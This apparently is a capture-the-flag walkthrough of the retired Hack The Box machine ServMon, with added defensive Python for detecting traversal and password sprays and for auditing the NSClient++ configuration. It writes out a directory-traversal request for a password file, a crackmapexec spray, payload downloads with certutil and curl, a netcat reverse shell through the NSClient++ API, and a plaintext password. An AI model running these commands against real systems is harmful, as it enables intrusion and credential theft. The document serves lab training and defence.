HTB Walkthrough: ServMon w/o Metasploit (retired)
ServMon is a retired box on HTB and is part of TJ Null's list of OSCP-like boxes.

Hostname: ServMon | Difficulty Level: Easy | Operating System: Windows
NMAP Scan
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# nmap -sC -sV -Pn -oA ServMon 10.10.10.184
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-06 19:12 EDT
Nmap scan report for 10.10.10.184
Host is up (0.085s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| iday
|_ Sat:Saturday
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.91%T=SSL%I=7%D=5/6%Time=609477DE%P=x86_64-pc-linux-gnu
SF:%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation:
SF:\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0iday\0Sat:Saturday\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0")%r(HTTPOptions,3
SF:6,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20
SF:found")%r(FourOhFourRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x20
SF:18\r\n\r\nDocument\x20not\x20found")%r(RTSPRequest,36,"HTTP/1\.1\x20404
SF:\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(SIPOption
SF:s,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\
SF:x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 14m56s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-06T23:27:41
|_ start_date: N/A
Enumeration
Anonymous login is allowed. Exploring FTP to find sensitive/interesting files.
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# ftp 10.10.10.184
ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:06PM <DIR> Nadine
01-18-20 12:08PM <DIR> Nathan
ftp> cd Nadine
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:08PM 174 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
ftp> cd Nathan
250 CWD command successful.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
Viewing the contents of the files obtained from FTP:
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# cat Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards
Nadine
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
Browsing to the web server shows a login page: http://10.10.10.184/Pages/login.htm
From the to-do notes on FTP, we know NVMS is still publicly accessible. Looking in searchsploit for vulnerabilities:
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# searchsploit NVMS
NVMS 1000 - Directory Traversal
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# searchsploit -m hardware/webapps/47774.txt
From the exploit above, NVMS-1000 is vulnerable to a directory traversal that allows arbitrary file reads (LFI).
Exploitation
Replicating the exploit in Burp Suite.

Let us try to extract Passwords.txt from Nathan's Desktop, as hinted in Confidential.txt (from FTP).
Request:
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.184/
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
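The same request seen from the defender's side, as an added example (code written for this write-up, not part of the original walkthrough or of NVMS): it scans constructed access-log lines for requests that climb out of the web root, including percent-encoded and double-encoded forms, and shows the path check a server needs in order to refuse them. The web-root path, client IPs and log lines are all made up for illustration.

```python
# Added example (not part of the original walkthrough): detection and
# mitigation for the directory-traversal read shown above. The web-root
# path, log lines and client IPs are constructed for illustration.
import posixpath
import re
from typing import Optional
from urllib.parse import unquote

# Constructed access-log lines in common log format (not taken from the box).
SAMPLE_LOG = """\
10.10.14.5 - - [06/May/2021:19:30:01 -0400] "GET /Pages/login.htm HTTP/1.1" 200 1532
10.10.14.5 - - [06/May/2021:19:30:09 -0400] "GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 156
10.10.14.5 - - [06/May/2021:19:30:15 -0400] "GET /..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1" 200 92
10.10.14.7 - - [06/May/2021:19:31:00 -0400] "GET /images/logo.png HTTP/1.1" 200 8123
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(path: str) -> str:
    """Drop the query string, percent-decode twice (so %252e%252e is caught too)
    and fold backslashes to forward slashes, since Windows servers accept both."""
    return unquote(unquote(path.split("?", 1)[0])).replace("\\", "/")


def escapes_root(path: str) -> bool:
    """Walk the normalised segments with a depth counter; any '..' that would
    climb above the web root marks the request as traversal."""
    depth = 0
    for seg in normalize(path).split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def scan_log(text: str) -> list:
    """Return (client ip, raw path, status) for every request that escapes the root.
    A 200 on such a request means the server actually served the file."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and escapes_root(m.group("path")):
            hits.append((m.group("ip"), m.group("path"), int(m.group("status"))))
    return hits


def safe_resolve(webroot: str, requested: str) -> Optional[str]:
    """Server-side fix: map the request onto the web root and refuse anything
    that normalises to a location outside it. (A production server should
    also resolve symlinks before making the comparison.)"""
    root = posixpath.normpath(webroot)
    candidate = posixpath.normpath(posixpath.join(root, normalize(requested).lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for ip, path, status in scan_log(SAMPLE_LOG):
        print(f"traversal from {ip}: {path} (HTTP {status})")
```

Run over the constructed log, only the two requests from 10.10.14.5 that leave the root are reported; a request like /a/../b stays inside the root and is not flagged. safe_resolve is the check that was missing in the vulnerable server: it returns None for the Passwords.txt request and the normal web-root path for /Pages/login.htm.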

Tried logging in to NVMS-1000 and NSClient++ with the recovered users and passwords, without success. Let us try SMB authentication with crackmapexec instead.
Users.txt includes admin, nathan and nadine; Passwords.txt includes the password extracted via the LFI. Running crackmapexec with both lists finds a valid login for user Nadine.
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# crackmapexec smb 10.10.10.184 -u users.txt -p passwords.txt
SMB 10.10.10.184 445 SERVMON [+] ServMon\Nadine:<password>
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# crackmapexec smb 10.10.10.184 -u Nadine -p <matched-password>@W0rk --shares
SMB 10.10.10.184 445 SERVMON [*] Windows 10.0 Build 18362 x64 (name:SERVMON) (domain:ServMon) (signing:False) (SMBv1:False)
SMB 10.10.10.184 445 SERVMON [+] ServMon\Nadine:L1k3B1gBut7s@W0rk
SMB 10.10.10.184 445 SERVMON [+] Enumerated shares
SMB 10.10.10.184 445 SERVMON Share    Permissions    Remark
SMB 10.10.10.184 445 SERVMON -----    -----------    ------
SMB 10.10.10.184 445 SERVMON ADMIN$                  Remote Admin
SMB 10.10.10.184 445 SERVMON C$                      Default share
SMB 10.10.10.184 445 SERVMON IPC$     READ           Remote IPC
Enumerating the IPC$ share, since it is the only one with READ permission:
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# smbmap -H 10.10.10.184 -u Nadine -p <matched-password>@W0rk -R IPC$
Unable to read any file. Let us try crackmapexec against SSH with the same credentials.
Running crackmapexec against SSH with user nadine and passwords.txt finds a match with the same credentials as for SMB.
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# crackmapexec ssh 10.10.10.184 -u nadine -p passwords.txt
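The SMB and SSH password spray above leaves a characteristic trail in the Windows Security log. As an added example (code written for this write-up, not from the original walkthrough or from crackmapexec), here is a small detector that groups failed logons (event 4625) per source address and reports any source that fails across several accounts in a short window, together with the account that then succeeded (event 4624) from the same source. The event rows, field names and IP addresses are constructed; in practice they would be exported from the Security log or a SIEM.

```python
# Added example (not part of the original walkthrough): spot a list-vs-list
# password spray from the defender's side. The rows below are constructed;
# real 4625/4624 events would be exported from the Windows Security log.
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed events: 4625 = failed logon, 4624 = successful logon,
# logon type 3 = network logon (SMB). Column names are this example's own.
SAMPLE_EVENTS = """\
time,event_id,account,source_ip,logon_type
2021-05-06T23:40:01,4625,admin,10.10.14.5,3
2021-05-06T23:40:01,4625,nathan,10.10.14.5,3
2021-05-06T23:40:02,4625,nadine,10.10.14.5,3
2021-05-06T23:40:02,4625,admin,10.10.14.5,3
2021-05-06T23:40:03,4625,nathan,10.10.14.5,3
2021-05-06T23:40:03,4624,nadine,10.10.14.5,3
2021-05-06T23:45:00,4625,nathan,10.10.14.9,3
2021-05-06T23:46:10,4624,nathan,10.10.14.9,3
"""


def parse_events(text):
    """Read CSV rows into dicts with a real datetime and an int event id."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["time"] = datetime.fromisoformat(row["time"])
        row["event_id"] = int(row["event_id"])
        rows.append(row)
    return rows


def detect_spray(events, window=timedelta(minutes=5), min_failures=4, min_accounts=2):
    """One finding per source address whose failures inside `window` reach
    `min_failures` attempts spread over at least `min_accounts` accounts
    (a spray, as opposed to one user mistyping a password). Successful
    logons from the same source shortly afterwards are recorded too, since
    those are the credentials to rotate first."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["source_ip"]].append(e)

    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        fails = [e for e in evs if e["event_id"] == 4625]
        for i, first in enumerate(fails):
            in_win = [f for f in fails[i:] if f["time"] - first["time"] <= window]
            accounts = {f["account"] for f in in_win}
            if len(in_win) >= min_failures and len(accounts) >= min_accounts:
                deadline = in_win[-1]["time"] + window
                success = {e["account"] for e in evs
                           if e["event_id"] == 4624 and first["time"] <= e["time"] <= deadline}
                findings.append({
                    "source_ip": ip,
                    "failures": len(in_win),
                    "accounts": sorted(accounts),
                    "success_after_spray": sorted(success),
                })
                break  # report each source once
    return findings


if __name__ == "__main__":
    for finding in detect_spray(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

On the constructed data only 10.10.14.5 is reported: five failures over three accounts in two seconds, followed by a successful logon as nadine. The single failure from 10.10.14.9 followed by a success is what a legitimate user looks like and stays below the thresholds.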
SSHing into the box with the above credentials succeeds.
Microsoft Windows [Version 10.0.18363.752]
© 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>whoami
servmon\nadine
You will get the user flag.
Privilege Escalation
Browse to https://10.10.10.184:8443
Use Chromium for browsing, as Firefox does not load the page correctly.
When you click 'forget password', you will get the pop-up below:

┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# searchsploit NSClient
NSClient++ 0.5.2.35 - Privilege Escalation
┌──(root💀kali)-[/home/kali/labs/HTB/ServMon]
└─# searchsploit -m windows/local/46802.txt
Verifying NSClient++ version on target:
nadine@SERVMON C:\Program Files\NSClient++>nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64
So it is vulnerable to the above exploit. Following the steps mentioned in the exploit:
(a) In the SSH session, enter the commands below:
nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: <Web admin password>
(b) Verifying that 'CheckExternalScripts' and 'Scheduler' are enabled in C:\Program Files\NSClient++\nsclient.ini
(c) Transferring evil.bat and nc.exe to the target from Kali
nadine@SERVMON C:\Temp>Certutil -urlcache -f "http://<Kali IP>:8000/evil.bat" evil.bat
**** Online ****
CertUtil: -URLCache command completed successfully.
Many file transfer methods, CertUtil included, were getting denied. Curl worked.
Note: use a 64-bit nc.exe rather than the one shipped with Kali.
nadine@SERVMON C:\Temp> curl 10.10.XX.XX:8000/nc.exe -o nc.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 59392  100 59392    0     0  59392      0  0:00:01 --:--:--  0:00:01  527k
(d) Setup listener on Kali
┌──(root💀kali)-[~]
└─# nc -lvnp 9876
(e) From 'C:\Program Files\NSClient++\nsclient.ini', we can see that the allowed host is 127.0.0.1, so we need an SSH port forward so that our requests arrive from 127.0.0.1:
; Undocumented key
allowed hosts = 127.0.0.1
SSH port forwarding:
In Kali: ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
Browse to https://localhost:8443 from Chromium. Enter the web admin password obtained from nsclient.ini and log in.
Performing step 5 from the exploit: add a script named foobar that calls evil.bat, and save the settings.

Performing step 6 from the exploit: add a schedule that runs the script every 1 minute, and save the settings.

The last step is to restart the computer and wait for the connection. A Google search for "nsclient++ restart" leads to this page: https://docs.nsclient.org/web/
On the left-hand side, click 'Control > Reload' and you will get a reverse shell and the root flag.
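Every ingredient of this escalation came out of nsclient.ini: a clear-text web password readable by an ordinary user, CheckExternalScripts and Scheduler enabled alongside the web server, and an "allowed hosts" restriction that only covers remote clients. As an added example (code written for this write-up, not part of the original walkthrough or of NSClient++), here is a small audit script that parses such a file and flags those settings. The excerpt is constructed to mirror the keys quoted above; the section names follow NSClient++'s "/modules" and "/settings/..." layout but are an assumption here, not copied from the box.

```python
# Added example (not part of the original walkthrough): audit an nsclient.ini
# for the settings the escalation above relied on. The excerpt is constructed
# and the section names are assumed from NSClient++'s documented layout.
import configparser

SAMPLE_INI = """\
; Constructed excerpt, not the file from the box
[/settings/default]
; Undocumented key
allowed hosts = 127.0.0.1
password = <web admin password>

[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/external scripts]
allow arguments = true
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def load_ini(text):
    """Parse with key case preserved and no %-interpolation (passwords may contain %)."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str
    cp.read_string(text)
    return cp


def audit_nsclient_ini(text):
    """Return (severity, message) findings; an empty list means nothing was flagged."""
    cp = load_ini(text)

    def enabled(section, key):
        value = cp.get(section, key, fallback="disabled").strip().lower()
        return value in {"enabled", "1", "true"}

    findings = []
    ext = enabled("/modules", "CheckExternalScripts")
    sched = enabled("/modules", "Scheduler")
    web = enabled("/modules", "WEBServer")
    if ext and web:
        findings.append(("high", "CheckExternalScripts and WEBServer both enabled: anyone holding the "
                                 "web password can register scripts that run as the service account"))
    if ext and sched:
        findings.append(("high", "Scheduler enabled together with external scripts: registered scripts "
                                 "can be run unattended on a timer"))
    if cp.get("/settings/default", "password", fallback="").strip():
        findings.append(("high", "web password stored in clear text in nsclient.ini: restrict the "
                                 "file's ACL to administrators and rotate the password"))
    hosts = {h.strip() for h in cp.get("/settings/default", "allowed hosts", fallback="").split(",")
             if h.strip()}
    if hosts and hosts <= LOOPBACK:
        findings.append(("medium", "allowed hosts is loopback only: this keeps remote clients out but "
                                   "does nothing against local users who can already reach the port"))
    if cp.get("/settings/external scripts", "allow arguments", fallback="false").strip().lower() == "true":
        findings.append(("medium", "allow arguments = true: callers may pass arbitrary arguments to "
                                   "external scripts"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_nsclient_ini(SAMPLE_INI):
        print(f"[{severity}] {message}")
```

Against the constructed excerpt the audit raises three high and two medium findings. Disabling CheckExternalScripts when it is not needed, removing the clear-text password (or locking the file down to administrators) and turning off allow arguments brings it down to the single note about the loopback-only host list, which is worth keeping in mind wherever low-privileged users have shell access to the host.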
Alternate Privilege Escalation #1: Using API
Instead of steps 5 and 6, enter the curl commands below:
(a) curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/evil.bat --data-binary "c:\Temp\nc.exe <Kali IP> 443 -e cmd.exe"
(b) curl -s -k -u admin https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat
(c) curl -s -k -u admin https://localhost:8443/api/v1/queries/evil/commands/execute?time=1m
You will get a reverse shell and the root flag.
Alternate Privilege Escalation #2: Running script directly from Web Interface
Settings > External Scripts > Scripts > Add a simple script

In the web console, run 'Momo' and you will get a reverse shell.